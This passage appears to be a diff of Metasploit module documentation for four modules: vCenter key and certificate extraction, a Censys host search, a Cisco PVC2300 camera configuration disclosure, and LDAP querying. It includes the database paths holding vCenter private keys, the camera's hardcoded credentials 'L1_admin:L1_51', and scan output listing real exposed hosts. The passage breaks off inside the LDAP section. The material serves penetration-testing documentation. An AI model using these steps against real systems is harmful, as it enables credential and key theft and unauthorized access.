+`VC_IP` option to tag relevant loot entries with the IPv4 address of the originating system. If no
+value is provided for `VC_IP` the module defaults to assigning the loopback IP `127.0.0.1`.
+
+1. Acquire the vmdir and/or vmafd database files from vCenter (see below)
+2. Start msfconsole
+3. Do: `use auxiliary/admin/vmware/vcenter_offline_mdb_extract`
+4. Do: `set vmdir_mdb <path to data.mdb>` if you are extracting from the vmdir database
+5. Do: `set vmafd_db <path to afd.db>` if you are extracting from the vmafd database
+6. Do: `set vc_ip <vCenter IPv4>` to attach the target vCenter IPv4 address to loot entries
+7. Do: `dump`
+
+## Options
+**VMDIR_MDB**
+
+Path to the vmdird MDB database file on the local system. Example: `/tmp/data.mdb`
+
+**VMAFD_DB**
+
+Path to the vmafd DB file on the local system. Example: `/tmp/afd.db`
+
+**VC_IP**
+
+Optional parameter to set the IPv4 address associated with loot entries made by the module.
+
+## Scenarios
+
+### Acquire Database Files
+This module targets the internal databases of vCenter vmdir (OpenLDAP Memory-Mapped Database) and
+vmafd (SQLite3). On a live vCenter appliance, these files can be downloaded with root access from
+the following locations:
+
+`vmdir: /storage/db/vmware-vmdir/data.mdb`
+`vmafd: /storage/db/vmware-vmafd/afd.db`
+    
+If you are extracting from a backup file, target files are available in the following archives:
+
+`vmdir: lotus_backup.tar.gz`
+`vmafd: config_files.tar.gz`
+
+### Running the Module
+Example run against database files extracted from vCenter appliance version 7.0 Update 3d:
+
+```
+msf6 > use auxiliary/admin/vmware/vcenter_offline_mdb_extract
+msf6 auxiliary(admin/vmware/vcenter_offline_mdb_extract) > set vmdir_mdb /tmp/data.mdb
+vmdir_mdb => /tmp/data.mdb
+msf6 auxiliary(admin/vmware/vcenter_offline_mdb_extract) > set vmafd_db /tmp/afd.db
+vmafd_db => /tmp/afd.db
+msf6 auxiliary(admin/vmware/vcenter_offline_mdb_extract) > set vc_ip 192.168.100.70
+vc_ip => 192.168.100.70
+msf6 auxiliary(admin/vmware/vcenter_offline_mdb_extract) > dump
+
+[*] Extracting vmwSTSTenantCredential from /tmp/data.mdb ...
+[+] SSO_STS_IDP key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_idp_571080.key
+[+] SSO_STS_IDP cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_idp_564729.pem
+[+] VMCA_ROOT cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_vmca_721819.pem
+[*] Extracting vSphere platform certificates from /tmp/afd.db ...
+[+] __MACHINE_CERT key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70___MACHINE_CERT_869237.key
+[+] __MACHINE_CERT cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70___MACHINE_CERT_240839.pem
+[+] DATA-ENCIPHERMENT key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_DATAENCIPHERMEN_350586.key
+[+] DATA-ENCIPHERMENT cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_DATAENCIPHERMEN_106169.pem
+[+] HVC key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_HVC_825963.key
+[+] HVC cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_HVC_399928.pem
+[+] MACHINE key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_MACHINE_995574.key
+[+] MACHINE cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_MACHINE_156797.pem
+[+] SMS_SELF_SIGNED key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_SMS_SELF_SIGNED_169524.key
+[+] SMS_SELF_SIGNED cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_SMS_SELF_SIGNED_230704.pem
+[+] VPXD key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_VPXD_370336.key
+[+] VPXD cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_VPXD_300599.pem
+[+] VPXD-EXTENSION key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_VPXDEXTENSION_571196.key
+[+] VPXD-EXTENSION cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_VPXDEXTENSION_088742.pem
+[+] VSPHERE-WEBCLIENT key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_VSPHEREWEBCLIEN_060718.key
+[+] VSPHERE-WEBCLIENT cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_VSPHEREWEBCLIEN_280013.pem
+[+] WCP key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_WCP_057402.key
+[+] WCP cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_WCP_909204.pem
+[*] Auxiliary module execution completed
+msf6 auxiliary(admin/vmware/vcenter_offline_mdb_extract) > 
+```
@@ -1,212 +1,131 @@
 ## Vulnerable Application

-The module use the Censys REST API to access the same data accessible through web interface.
-The search endpoint allows searches against the current data in the IPv4, Top Million Websites, and Certificates indexes using the same search syntax as the primary site.
+The module uses the Censys REST API to access the same data accessible through
+the web interface. The search endpoint allows queries using the Censys Search
+Language against the Hosts dataset. Setting the CERTIFICATES option will also
+retrieve the certificate details for each relevant service by querying the
+Certificates dataset.

 ## Verification Steps

 1. Do: `use auxiliary/gather/censys_search`
-2. Do: `set CENSYS_UID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX` (length: 32 (without dashes))
-3. Do: `set CENSYS_SECRET XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX` (length: 32)
-4. Do: `set CENSYS_SEARCHTYPE certificates`
-5: Do: `set CENSYS_DORK query`
-6: Do: `run`
+1. Do: `set CENSYS_UID XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX` (length: 32 (without dashes))
+1. Do: `set CENSYS_SECRET XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX` (length: 32)
+1. Do: `set CERTIFICATES true` (to get certificates details - optional)
+1. Do: `set QUERY <query>`
+1. Do: `run`

 ## Scenarios

-### Certificates Search
+A single keyword or a domain name can be used. For advanced searches, the Censys Search Language can also be used.
+Here, the following query is used to get the hosts running FTP or Telnet in Germany:
+```
+location.country_code: DE and services.service_name: {"FTP", "Telnet"}
+```
+
+### Without certificates details

 ```
-msf auxiliary(censys_search) > set CENSYS_DORK rapid7
-CENSYS_DORK => rapid7
-msf auxiliary(censys_search) > set CENSYS_SEARCHTYPE certificates
-CENSYS_SEARCHTYPE => certificates
+msf6 auxiliary(gather/censys_search) > run verbose=true QUERY="location.country_code: DE and services.service_name: {"FTP", "Telnet"}" CENSYS_UID=<redacted> CENSYS_SECRET=<redacted>
+
+[+] 2.19.184.189 - 21/FTP,22/SSH,80/HTTP,443/HTTP
+[+] 2.19.184.214 - 21/FTP
+[+] 2.19.184.216 - 21/FTP
+[+] 2.23.14.108 - 21/FTP
+[+] 2.23.14.163 - 21/FTP,449/UNKNOWN,515/UNKNOWN,4101/UNKNOWN,4222/UNKNOWN,44100/UNKNOWN,44104/UNKNOWN,44117/UNKNOWN,44133/UNKNOWN,44156/UNKNOWN,44161/UNKNOWN,44162/UNKNOWN,44170/UNKNOWN,44174/UNKNOWN
+[+] 2.23.14.195 - 21/FTP,45108/UNKNOWN,45110/UNKNOWN,45111/UNKNOWN,45117/UNKNOWN,45149/UNKNOWN,45150/UNKNOWN,45164/UNKNOWN
+[+] 2.23.14.199 - 21/FTP
+[+] 2.23.14.201 - 21/FTP,47106/UNKNOWN,47113/UNKNOWN,47150/UNKNOWN
+[+] 2.23.14.209 - 21/FTP,49100/UNKNOWN,49121/UNKNOWN,49143/UNKNOWN,49152/UNKNOWN
+[+] 2.23.14.212 - 21/FTP
+[+] 2.23.14.218 - 21/FTP
+[+] 2.23.14.235 - 21/FTP
+[+] 2.23.14.243 - 21/FTP
+[+] 2.23.15.71 - 21/FTP,22/SSH,80/HTTP,443/HTTP
+[+] 2.23.15.238 - 21/FTP,80/HTTP,443/HTTP
+[+] 2.56.11.154 - 21/FTP,22/SSH,25/SMTP,53/DNS,80/HTTP,110/POP3,143/IMAP,443/HTTP,465/SMTP,587/SMTP,993/IMAP,2077/HTTP,2078/HTTP,2079/HTTP,2080/HTTP,2082/HTTP,2083/HTTP,2086/HTTP,2087/HTTP,2095/HTTP,2096/HTTP,3306/MYSQL
+[+] 2.56.11.222 - 21/FTP,22/SSH,80/HTTP,111/PORTMAP,137/NETBIOS,443/HTTP,445/SMB
+[+] 2.56.77.123 - 21/FTP,22/SSH,80/HTTP
+[+] 2.56.77.162 - 21/FTP,25/SMTP,80/HTTP,443/HTTP,465/SMTP,587/SMTP,993/IMAP,5022/SSH,8443/HTTP,50080/HTTP
+[+] 2.56.77.185 - 21/FTP,25/SMTP,587/SMTP,1024/HTTP,1723/PPTP,4444/UNKNOWN
+[+] 2.56.77.186 - 21/FTP,25/SMTP,80/HTTP,443/HTTP,465/SMTP,587/SMTP,1024/HTTP,1723/PPTP,4444/UNKNOWN,5060/SIP
+[+] 2.56.77.189 - 21/FTP,25/SMTP,80/HTTP,443/HTTP,465/SMTP,587/SMTP,1024/HTTP,1723/PPTP,4444/HTTP,8080/HTTP,50080/HTTP
 ...
-[+] 199.15.214.152 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 31.214.157.19 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 31.220.7.39 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 168.253.216.190 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 52.88.1.225 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 208.118.237.41 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 64.125.235.5 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 208.118.237.39 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 208.118.237.40 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 208.118.227.12 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 208.118.237.38 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 23.48.13.195 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 208.118.227.14 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.252.134 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.63 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.242 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.187 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.64 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.181 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.17 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.183 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 54.230.249.186 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 199.15.214.152 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 31.214.157.19 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 31.220.7.39 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 168.253.216.190 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 52.88.1.225 - C=US, ST=TX, L=Austin, O=Rapid7, CN=MetasploitSelfSignedCA
-[+] 208.118.237.41 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 64.125.235.5 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 208.118.237.39 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 208.118.237.40 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 208.118.227.12 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 208.118.237.38 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 23.48.13.195 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 208.118.227.14 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.252.134 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.63 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.242 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.187 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.64 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.181 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.17 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.183 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 54.230.249.186 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 199.15.214.152 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 31.214.157.19 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 31.220.7.39 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 168.253.216.190 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 52.88.1.225 - C=US, ST=TX, L=Austin, O=Rapid7, CN=localhost
-[+] 208.118.237.41 - CN=NeXpose Security Console, O=Rapid7
+```
+
+### With certificates details
+
+```
+msf6 auxiliary(gather/censys_search) > run verbose=true QUERY="location.country_code: DE and services.service_name: {"FTP", "Telnet"}" CENSYS_UID=<redacted> CENSYS_SECRET=<redacted> CERTIFICATES=true
+
+[+] 2.19.184.189 - 21/FTP,22/SSH,80/HTTP,443/HTTP
+[*] Certificate for 21/FTP: C=US, ST=California, L=Mountain View, O=Synopsys\, Inc., CN=eft.synopsys.com (Issuer: C=US, O=Entrust\, Inc., OU=See www.entrust.net/legal-terms, OU=(c) 2012 Entrust\, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K)
+[*] Certificate for 443/HTTP: C=US, ST=California, L=Mountain View, O=Synopsys\, Inc., CN=eft.synopsys.com (Issuer: C=US, O=Entrust\, Inc., OU=See www.entrust.net/legal-terms, OU=(c) 2012 Entrust\, Inc. - for authorized use only, CN=Entrust Certification Authority - L1K)
+[+] 2.19.184.214 - 21/FTP
+[+] 2.19.184.216 - 21/FTP
+[+] 2.23.14.108 - 21/FTP
+[+] 2.23.14.163 - 21/FTP,449/UNKNOWN,515/UNKNOWN,4101/UNKNOWN,4222/UNKNOWN,44100/UNKNOWN,44104/UNKNOWN,44117/UNKNOWN,44133/UNKNOWN,44156/UNKNOWN,44161/UNKNOWN,44162/UNKNOWN,44170/UNKNOWN,44174/UNKNOWN
+[+] 2.23.14.195 - 21/FTP,45108/UNKNOWN,45110/UNKNOWN,45111/UNKNOWN,45117/UNKNOWN,45149/UNKNOWN,45150/UNKNOWN,45164/UNKNOWN
+[+] 2.23.14.199 - 21/FTP
+[+] 2.23.14.201 - 21/FTP,47106/UNKNOWN,47113/UNKNOWN,47150/UNKNOWN
+[+] 2.23.14.209 - 21/FTP,49100/UNKNOWN,49121/UNKNOWN,49143/UNKNOWN,49152/UNKNOWN
+[+] 2.23.14.212 - 21/FTP
+[*] Certificate for 21/FTP: C=US, ST=Vermont, L=Colchester, O=VERMONT INFORMATION PROCESSING\, INC., CN=*.vtinfo.com (Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1)
+[+] 2.23.14.218 - 21/FTP
+[*] Certificate for 21/FTP: C=US, ST=Vermont, L=Colchester, O=VERMONT INFORMATION PROCESSING\, INC., CN=*.vtinfo.com (Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1)
+[+] 2.23.14.235 - 21/FTP
+[+] 2.23.14.243 - 21/FTP
 ...

-```
-
-### IPv4 Search
+msf6 auxiliary(gather/censys_search) > services
+Services
+========

-```
-msf auxiliary(censys_search) > set CENSYS_DORK rapid7
-CENSYS_DORK => rapid7
-msf auxiliary(censys_search) > set CENSYS_SEARCHTYPE ipv4
-CENSYS_SEARCHTYPE => ipv4
-[*] 197.117.5.36 - 443/https
-[*] 208.118.237.81 - 443/https
-[*] 206.19.237.19 - 443/https
-[*] 54.214.49.70 - 80/http,443/https
-[*] 208.118.237.241 - 443/https
-[*] 162.220.246.141 - 443/https,22/ssh,80/http
-[*] 31.214.157.19 - 443/https,22/ssh
-[*] 52.88.1.225 - 443/https,22/ssh
-[*] 208.118.227.12 - 25/smtp
-[*] 38.107.201.41 - 443/https
-[*] 52.44.56.126 - 80/http,443/https
-[*] 52.54.227.6 - 443/https,80/http
-[*] 23.217.253.242 - 443/https,80/http
-[*] 96.6.3.45 - 80/http,443/https
-[*] 23.6.73.47 - 443/https,80/http
-[*] 23.78.99.243 - 80/http,443/https
-[*] 23.53.51.170 - 80/http,443/https
-[*] 23.62.201.47 - 443/https,80/http
-[*] 2.23.50.157 - 443/https,80/http
-[*] 118.215.191.13 - 80/http,443/https
-[*] 2.19.185.28 - 80/http,443/https
-[*] 2.18.195.99 - 443/https,80/http
-[*] 23.197.196.25 - 443/https,80/http
-[*] 95.100.104.181 - 443/https,80/http
-[*] 2.20.37.130 - 80/http,443/https
-[*] 23.194.237.34 - 443/https,80/http
-[*] 2.17.140.86 - 443/https,80/http
-[*] 64.125.235.5 - 25/smtp
-[*] 208.118.227.32 - 80/http
-[*] 2.21.129.149 - 80/http,443/https
-[*] 2.20.167.33 - 80/http,443/https
-[*] 95.100.139.218 - 80/http,443/https
-[*] 23.38.88.202 - 443/https,80/http
-[*] 2.17.184.80 - 443/https,80/http
-[*] 23.59.119.23 - 80/http,443/https
-[*] 2.16.14.225 - 443/https,80/http
-[*] 104.113.122.33 - 443/https,80/http
-[*] 23.223.44.164 - 80/http,443/https
-[*] 88.221.120.214 - 443/https,80/http
-[*] 23.47.36.145 - 443/https,80/http
-[*] 2.23.21.254 - 80/http,443/https
-[*] 208.118.237.39 - 443/https
-[*] 208.118.237.40 - 443/https
-[*] 208.118.237.41 - 443/https
-[*] 23.54.217.47 - 80/http,443/https
-[*] 96.17.254.188 - 443/https,80/http
-[*] 184.25.129.65 - 443/https,80/http
-[*] 104.121.167.123 - 443/https,80/http
-[*] 104.94.110.63 - 443/https,80/http
-[*] 104.91.11.216 - 80/http,443/https
-[*] 23.38.233.47 - 80/http,443/https
-[*] 52.86.110.89 - 80/http,443/https
-[*] 69.192.73.47 - 443/https,80/http
-[*] 184.86.57.47 - 443/https,80/http
-[*] 104.86.45.180 - 443/https,80/http
-[*] 184.87.72.153 - 80/http,443/https
-[*] 23.66.25.47 - 80/http,443/https
-[*] 23.56.162.76 - 80/http,443/https
-[*] 184.87.133.242 - 443/https,80/http
-[*] 23.55.74.28 - 80/http,443/https
-[*] 23.6.225.84 - 80/http,443/https
-[*] 23.46.133.153 - 443/https,80/http
-[*] 23.10.121.47 - 443/https,80/http
-[*] 104.109.35.169 - 80/http,443/https
-[*] 172.227.101.182 - 80/http,443/https
-[*] 184.27.23.104 - 80/http,443/https
-[*] 23.49.185.47 - 80/http,443/https
-[*] 23.67.172.177 - 80/http,443/https
-[*] 23.62.170.161 - 443/https,80/http
-[*] 23.219.71.35 - 443/https,80/http
-[*] 104.82.94.233 - 443/https,80/http
-[*] 184.26.73.47 - 80/http,443/https
-[*] 104.68.108.237 - 80/http,443/https
-[*] 23.60.39.77 - 80/http,443/https
-[*] 23.66.100.92 - 80/http,443/https
-[*] 23.61.28.182 - 443/https,80/http
-[*] 23.42.116.233 - 80/http,443/https
-[*] 104.105.14.197 - 80/http,443/https
-[*] 104.103.203.240 - 80/http,443/https
-[*] 104.65.57.235 - 80/http,443/https
-[*] 23.41.83.224 - 80/http,443/https
-[*] 184.51.185.47 - 80/http,443/https
-[*] 23.67.231.142 - 80/http,443/https
-[*] 208.118.237.38 - 443/https
-[*] 104.76.25.28 - 80/http,443/https
-[*] 23.196.125.176 - 443/https,80/http
-[*] 23.40.154.224 - 80/http,443/https
-[*] 23.77.33.204 - 443/https,80/http
-[*] 104.88.21.48 - 80/http,443/https
-[*] 173.223.134.47 - 80/http,443/https
-[*] 23.4.98.72 - 80/http,443/https
-[*] 23.44.97.3 - 80/http,443/https
-[*] 23.203.66.142 - 443/https,80/http
-[*] 23.42.216.251 - 443/https,80/http
-[*] 23.42.85.25 - 80/http,443/https
-[*] 173.255.195.131 - 80/http,23/telnet,25/smtp,110/pop3,53/dns,443/https,22/ssh
-[*] 104.83.219.182 - 443/https,80/http
-[*] 184.86.41.47 - 443/https,80/http
-[*] 104.97.72.196 - 443/https,80/http
-[*] 69.192.169.48 - 443/https,80/http
-```
-
-### Websites Search
-
-```
-msf auxiliary(censys_search) > set CENSYS_DORK rapid7
-CENSYS_DORK => rapid7
-msf auxiliary(censys_search) > set CENSYS_SEARCHTYPE websites
-CENSYS_SEARCHTYPE => websites
-msf auxiliary(censys_search) > run
-
-[+] rapid7.com - [37743]
-[+] logentries.com - [45346]
-[+] venturefizz.com - [106102]
-[+] gild.com - [116853]
-[+] sectools.org - [122125]
-[+] ericzhang.me - [155622]
-[+] metasploit.com - [156435]
-[+] datapipe.com - [209756]
-[+] routerpwn.com - [317896]
-[+] proxy-base.com - [507954]
-[+] config.fr - [542346]
-[+] winterwyman.com - [629471]
-[+] gogrid.com - [741009]
-[+] wesecure.nl - [997423]
-[*] Auxiliary module execution completed
+host          port   proto  name     state  info
+----          ----   -----  ----     -----  ----
+2.19.184.189  80     tcp    http     open
+2.19.184.189  443    tcp    http     open   C=US, ST=California, L=Mountain View, O=Synopsys\, Inc., CN=eft.synopsys.com (Issuer: C=US, O=Entrust\, Inc., OU=See www.entrust.net/legal-terms, OU=(c) 2012 Entrust\, Inc. - for authorized use only, CN=Entrust Certification A
+                                            uthority - L1K)
+2.19.184.189  21     tcp    ftp      open   C=US, ST=California, L=Mountain View, O=Synopsys\, Inc., CN=eft.synopsys.com (Issuer: C=US, O=Entrust\, Inc., OU=See www.entrust.net/legal-terms, OU=(c) 2012 Entrust\, Inc. - for authorized use only, CN=Entrust Certification A
+                                            uthority - L1K)
+2.19.184.189  22     tcp    ssh      open
+2.19.184.214  21     tcp    ftp      open
+2.19.184.216  21     tcp    ftp      open
+2.23.14.108   21     tcp    ftp      open
+2.23.14.163   21     tcp    ftp      open
+2.23.14.163   44174  tcp    unknown  open
+2.23.14.163   449    tcp    unknown  open
+2.23.14.163   515    tcp    unknown  open
+2.23.14.163   4101   tcp    unknown  open
+2.23.14.163   4222   tcp    unknown  open
+2.23.14.163   44104  tcp    unknown  open
+2.23.14.163   44100  tcp    unknown  open
+2.23.14.163   44117  tcp    unknown  open
+2.23.14.163   44133  tcp    unknown  open
+2.23.14.163   44156  tcp    unknown  open
+2.23.14.163   44161  tcp    unknown  open
+2.23.14.163   44162  tcp    unknown  open
+2.23.14.163   44170  tcp    unknown  open
+2.23.14.195   45108  tcp    unknown  open
+2.23.14.195   45111  tcp    unknown  open
+2.23.14.195   45164  tcp    unknown  open
+2.23.14.195   45150  tcp    unknown  open
+2.23.14.195   45149  tcp    unknown  open
+2.23.14.195   21     tcp    ftp      open
+2.23.14.195   45117  tcp    unknown  open
+2.23.14.195   45110  tcp    unknown  open
+2.23.14.199   21     tcp    ftp      open
+2.23.14.201   47113  tcp    unknown  open
+2.23.14.201   21     tcp    ftp      open
+2.23.14.201   47106  tcp    unknown  open
+2.23.14.201   47150  tcp    unknown  open
+2.23.14.209   49100  tcp    unknown  open
+2.23.14.209   21     tcp    ftp      open
+2.23.14.209   49143  tcp    unknown  open
+2.23.14.209   49121  tcp    unknown  open
+2.23.14.209   49152  tcp    unknown  open
+2.23.14.212   21     tcp    ftp      open   C=US, ST=Vermont, L=Colchester, O=VERMONT INFORMATION PROCESSING\, INC., CN=*.vtinfo.com (Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1)
+2.23.14.218   21     tcp    ftp      open   C=US, ST=Vermont, L=Colchester, O=VERMONT INFORMATION PROCESSING\, INC., CN=*.vtinfo.com (Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1)
+2.23.14.235   21     tcp    ftp      open
+2.23.14.243   21     tcp    ftp      open
 ```
@@ -0,0 +1,55 @@
+## Vulnerable Application
+This module exploits an information disclosure vulnerability in Cisco PVC2300 cameras in order to download the configuration file
+containing the admin credentials for the web interface.
+
+The module first performs a basic check to see if the target is likely Cisco PVC2300. If so, the module attempts to obtain a sessionID
+via an HTTP GET request to the vulnerable /oamp/System.xml endpoint using the `login` action and the hardcoded credentials `L1_admin:L1_51`.
+
+If a session ID is obtained, the module uses it in another HTTP GET request to /oamp/System.xml that uses the `downloadConfigurationFile`
+action in an attempt to download the configuration file.
+
+The configuration file, if obtained, will be encdoded using base64 with a non-standard alphabet. In order to decode it,
+the module first translates the encoded configuration file from the default base64 alphabet to the custom alphabet.
+Then the configuration file is decoded using regular base64 and subsequently stored in the `loot` folder.
+
+Finally, the module attempts to extract the admin credentials to the web interface from the decoded configuration file.
+
+No known solution was made available for this vulnerability and no CVE has been published.
+It is therefore likely that most (if not all) Cisco PVC2300 cameras are affected.
+
+This module was successfully tested against several Cisco PVC2300 cameras.
+
+## Options
+No non-default options are configured.
+
+## Verification Steps
+1. Start msfconsole
+2. Do: `use auxiliary/gather/cisco_pvc2300_download_config`
+3. Do: `set RHOSTS [IP]`
+4. Do: `run`
+
+## Scenarios
+### Cisco PVC2300
+```
+Module options (auxiliary/gather/cisco_pvc_2300_info_disclosure):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   172.31.31.233    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    80               yes       The target port (TCP)
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+msf6 auxiliary(gather/cisco_pvc_2300_info_disclosure) > run
+[*] Running module against 172.31.31.233
+
+[*] The target may be vulnerable. Obtained sessionID 1122062985
+[+] Successfully downloaded the configuration file
+[*] Saving the full configuration file to /root/.msf4/loot/20220803124629_default_172.31.31.233_ciscopvc.config_489884.txt
+[*] Obtained device name PVC2300 POE Video Camera
+[+] Obtained the following admin credentials for the web interface from the configuration file:
+[*] admin username: admin
+[*] admin password: [obfuscated]
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,598 @@
+## Vulnerable Application
+This module allows users to query an LDAP server using either a custom LDAP query, or
+a set of LDAP queries under a specific category. Users can also specify a JSON or YAML
+file containing custom queries to be executed using the `RUN_QUERY_FILE` action.
+If this action is specified, then `QUERY_FILE_PATH` must be a path to the location
+of this JSON/YAML file on disk.
+
+Users can also run a single query by using the `RUN_SINGLE_QUERY` option and then setting
+the `QUERY_FILTER` datastore option to the filter to send to the LDAP server and `QUERY_ATTRIBUTES`
+to a comma seperated string containing the list of attributes they are interested in obtaining
+from the results.
+
+As a third option can run one of several predefined queries by setting `ACTION` to the
+appropriate value. These options will be loaded from the `ldap_queries_default.yaml` file
+located in the MSF configuration directory, located by default at `~/.msf4/ldap_queries_default.yaml`.
+
+Note that you can override the default query settings in this way by defining a query with an
+action name that is the same as one of existing actions in the file at
+`data/auxiliary/gather/ldap_query/ldap_queries_default.yaml`. This will however prevent any updates
+for that action that may be made to the `data/auxiliary/gather/ldap_query/ldap_queries_default.yaml`
+file, which may occur as part of Metasploit updates/upgrades, from being used though, so keep this
+in mind when using the `~/.msf4/ldap_queries_default.yaml` file.
+
+All results will be returned to the user in table, CSV or JSON format, depending on the value
+of the `OUTPUT_FORMAT` datastore option. The characters `||` will be used as a delimiter
+should multiple items exist within a single column.
+
+## Verification Steps
+
+1. Do: `use auxiliary/gather/ldap_query`
+2. Do: `set ACTION <target action>`
+3. Do: `set RHOSTS <target IP(s)>`
+4. Optional: `set RPORT <target port>` if target port is non-default.
+5: Optional: `set SSL true` if the target port is SSL enabled.
+6: Do: `run`
+
+## Options
+
+### OUTPUT_FORMAT
+The output format to use. Can be either `csv`, `table` or `json` for
+CSV, Rex table output, or JSON output respectively.
+
+### BASE_DN
+The LDAP base DN if already obtained. If not supplied, the module will
+automatically attempt to find the base DN for the target LDAP server.
+
+### QUERY_FILE_PATH
+If the `ACTION` is set to `RUN_QUERY_FILE`, then this option is required and
+must be set to the full path to the JSON or YAML file containing the queries to
+be run.
+
+The file format must follow the following convention:
+
+```
+queries:
+  - action: THE ACTION NAME
+    description: "THE ACTION DESCRIPTION"
+    filter: "THE LDAP FILTER"
+    attributes:
+      - dn
+      - displayName
+      - name
+      - description
+```
+
+Where `queries` is an array of queries to be run, each containing an `action` field
+containing the name of the action to be run, a `description` field describing the
+action, a `filter` field containing the filter to send to the LDAP server
+(aka what to search on), and the list of attributes that we are interested in from
+the results as an array.
+
+### QUERY_FILTER
+Used only when the `RUN_SINGLE_QUERY` action is used. This should be set to the filter
